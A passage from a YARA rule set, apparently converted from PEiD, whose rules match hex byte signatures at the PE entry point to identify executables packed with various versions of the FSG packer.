48 1C 2B 3A E8 02 00 00 00 38 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 
5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_50_60: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 
00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cppx: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_MASM32_TASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }\r\n        $b = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 
00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v131_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_4x_LCC_Win32_1x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 8E D8 B8 ?? ?? CD 21 A3 ?? ?? 3C 03 7D ?? B4 09 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v131_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB ?? ?? BA ?? ?? 81 C3 07 00 B8 40 B4 B1 04 D3 E8 03 C3 8C D9 49 8E C1 26 03 0E 03 00 2B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_Microsoft_Visual_Basic_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_dulekxt_: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_20_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? ?? 
61 94 55 A4 B6 80 FF 13 73 F9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_bartxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }\r\n        $b = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 
00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_ASM_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_Watcom_CCpp_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_100_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE ?? 74 EF FE }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_V131Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 
00 00 00 00 00 00 00 00 00 88 01 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n        $b = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v20_bartxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 
53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE ?? 74 EF FE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_133_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_13: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 
53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 1E 0E 1F B8 ?? ?? 8E C0 26 8A 1E ?? ?? 80 ?? ?? 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_MASM32_TASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_ASM_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 05 00 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v100_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 
53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $c = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_FSG_131: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_MASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 09 94 0F B7 FF 68 80 ?? ?? 
00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_FSG_131_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_10: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? 